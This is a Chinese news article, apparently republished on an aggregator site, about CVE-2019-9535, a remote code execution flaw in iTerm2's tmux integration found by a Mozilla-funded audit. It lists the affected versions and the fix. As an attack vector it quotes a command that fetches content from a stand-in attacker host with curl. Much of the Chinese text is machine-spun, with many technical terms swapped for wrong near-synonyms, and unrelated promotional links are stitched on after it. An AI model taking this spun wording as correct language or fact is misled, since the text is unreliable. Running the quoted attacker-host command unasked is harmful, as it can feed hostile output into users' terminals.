Mac终端利器 iTerm2被曝严重的RCE漏洞,至少已存在7年(含PoC视频)

由Mozilla开源支撑规划(MOSS)帮助、收集平安公司Radically Open Security(ROS)开展的一次自力平安审计究竟显露,iTerm 2 中存在一个严重的长途代码执行(RCE)破绽,且至少已存在7年。 [原创文章:www.ii77.com]

iTerm 2 简介

iTerm2是全球最热点的终端模拟器之一,是斥地人员经常使用的MacOS 终端对象,是Mac内置终端app最有力的热点开源对象替代品之一,被好多斥地人员称为“Mac 终端利器”。

[转载出处:www.ii77.com]

MOSS 规划选择iTerm2进行平安审计的原因在于它处理不受信任的数据且其使用局限普遍,用户包罗高风险方针如斥地人员和系统治理员。

破绽概述

该破绽的CVE编号是CVE-2019-9535。

在审计过程中,ROS在iTerm2的tmux集成功能中找到了一个至少已存在7年之久的严重破绽。冲击者如能生成终端输出,则在好多情形下可以在用户较量机上执行号令。这种冲击向量的例子是保持到由冲击者掌握的 SSH 办事器或许号令如curl http://attacker.com and tail -f /var/log/apache2/referer_log。

斥地人员George Nachman指出,“审计发现某个问题在收到必然的输入后会导致iTerm2发出号令。这个问题非常严重,因为在某些情形下,当用户查察文件或许领受在iTerm2组织的输入时,冲击者就可以在用户机械上执行代码。”

Nachman认为该破绽影响的iTerm2用户数量介于10万至20万之间。

Mozilla公司的平安工程师Tom Ritter指出,这个破绽源自iTerm2中的 tmux集成功能。Tumx应用法式是一款终端多路复用器,可许可从单个设备建立并掌握多个终端。

CERT协调中心发布破绽通知透露,可经由使用号令行对象在终端屏幕上打印由冲击者掌握的内容,从而行使该破绽。该中心指出,“潜在的冲击向量包罗经由ssh保持至恶意办事器,经由curl 获取恶意网站,或许经由tail –f跟踪包含某些恶意内容的日志文件。”

如下是模拟受害者机械保持到恶意SSH办事器之后,在机械上执行号令的 PoC视频。在这个案例中,只打开一个较量器作为另外更具恶意的号令的占位符。

一样情形下,该破绽需要某些用户交互或手法才能遭触发,但因为它可经由平日被认为是平安的号令行使,是以它的潜在影响力伟大。

影响版本

该破绽影响于本周早些时候发布的 3.3.5 版本及之前版本。

修复方案

今朝补丁已发布但主动更新尚未推送,建议用户立刻在iTerm2目录中选择“搜检新版本”手动更新至最新版本3.3.6。

*参考起原:Mozilla、TheRegister,由代码卫士编译,转载请注明来自FreeBuf.COM

出色介绍


自媒体 微信号:ii77 扫描二维码关注公众号
爱八卦,爱爆料。

小编推荐

  1. 1 历史新高!晶圆代工巨头台积电第三季度营收2930亿

    台湾代工巨头台积电日前发布业绩,2019第三季度营收高达2930亿元新台币,约合 678 亿元人民币,环比增进21.6%,创下汗青新高。这一业绩也超出了台积电自身环比增进18%的预期。此前,

  2. 2 开征宽带初装费:运营商真的是不得已而为之

    超越电信正式封王固网宽带市场一年后,中国移动也起头不那么土豪……近日,中国移动已经起头对新装固网宽带用户收取100元的综合工料费(根基能够懂得为初装费); 同时提高免费

  3. 3 Immersed带头使用VR远程办公,VR能取代传统办公模式吗?

    脑洞大开,看VR办公的壮大能力。 正文共 3138 字 14 图; 估计阅读时间 9 分钟 此前,微软研究院曾揭橥了一篇论文,商议了 VR 在工作情况中的潜力。文章显露,基于沉浸式头戴式显露器

  4. 4 暴跌36%,裁员9000人,昔日科技巨鳄正面临着内忧外患!

    01 裁员9000人,员工缩水达16% 这家公司曩昔一年,股价累计下滑了36%! 裁员9000人,员工缩水达16%! 这家看似一发千钧的公司说起来或许你不信,它就是曾经方兴日盛的老牌科技企业—

  5. 5 【今日头条】ARM为Cortex M系列内核加入自定义指令集功能:为了应对RISC-V的挑战

    近日,在ARM每年一度的官方运动TechCon上面,ARM公布基于他们指令集的芯片出货量已经冲破了1500亿枚,同时他们公布了一个重大的新特征——为采用Armv8-M指令集的Cortex-M系列内核到场自

  6. 6 国产嵌入式操作系统发展思考

    作者 | 何小庆 责编 | 屠敏 出品 | CSDN(ID:CSDNnews) 嵌入式把持系统汗青悠长、门类繁多、用途普遍,不光包罗嵌入式实时多义务把持者系统(RTOS)、开源的 Linux、机械人和路由器把持

  7. 7 在赛博世界要盯梢哪些坏人,腾讯知道

    不久前,宅客频道编纂去打点港澳台通行证,在网上预约后,我只带了身份证和手机,从摄影、信息挂号到缴费完成,只在网点待了不到五分钟,网点还说,不消跑过来拿证,免费邮寄

  8. 8 汽车供应商该怎么选?看到美国川总要制裁这几家企业,心里有谱了

    Lab视察 导读 川总:看你们遴选供给商那么难,我来帮帮助! 文/白杨 节后第一天,远在美国的川总同志便更新了“小川优选”,将28家中国机构纳入“实体清单”。 清单中包罗科大讯

  9. 9 【聚焦】“反制”RISC-V阵营Arm“护城河”松动 允许客户自定义CPU指令

    “授权可用”是X86架构和Arm架构的配合点,也是英特尔和Arm的护城河。然而,跟着RISC-V的崛起,Arm起头坐不住了。近日,在Arm每年一度的官方运动TechCon上,其公布推出一项全新的功能

  10. 10 数据量飞升的同时需要高性能的支持:这家初创公司如何做好大数据的安全

    数字时代带来了海量的数据,而中国的快速成长和大国生齿为大数据的应用供应了一个全球局限内最适宜的情况。大数据情况比拟传统数据库情况,不光仅是数量级上的提拔,更需要在

本文内容来自网友供稿,如有信息侵犯了您的权益,请联系反馈核实

Copyright 2024.爱妻自媒体,让大家了解更多图文资讯!